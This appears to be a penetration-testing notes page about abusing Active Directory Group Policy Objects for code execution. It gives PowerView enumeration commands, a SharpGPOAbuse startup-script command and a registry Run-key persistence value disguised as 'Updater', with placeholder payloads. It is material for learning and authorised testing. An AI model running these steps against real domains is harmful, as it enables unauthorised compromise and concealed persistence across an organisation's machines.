A GPO (Group Policy Object) is a collection of settings that define how computers and users on a network should behave. GPOs are used to enforce security policies, configure system settings, and manage software installations across multiple computers in an organization.
If domain users can modify a GPO, it can lead to several problems like having RCE on a machine.

Modifiable GPOs

1. Enumerate modifiable GPOs
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
2. If there is any, resolve its GPO name and the SID of the principal.
Get-DomainGPO -Identity "<ObjectDN>" | select displayName, gpcFileSysPath
ConvertFrom-SID <SecurityIdentifier>
3. Find out the OU where the GPO appears.
Get-DomainOU -GPLink "{RelativeDN}" | select distinguishedName
4. Get the computer where the GPO applies.
Get-DomainComputer -SearchBase "<OU_distinguishedname>" | select dnsHostName
5. Modify the GPO
.\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "<SCRIPT_CONTENT>" --GPOName "<GPO_NAME>"
6. Wait for the GPO to take effect (20 minutes or so).

Principals with Create groupPolicyContainer objects privilege

1. Enumerate principals (Users/groups) that can create new GPOs in the domain.
Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }
2. Look for OUs with "WriteProperty" on the attribute "GP-LINK".
3. Become the principal and create a GPO
Because we are using the autorun key registry, the workstation must be restarted so the payload is executed.
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "<COMMAND>" -Type ExpandString
Last modified 15d ago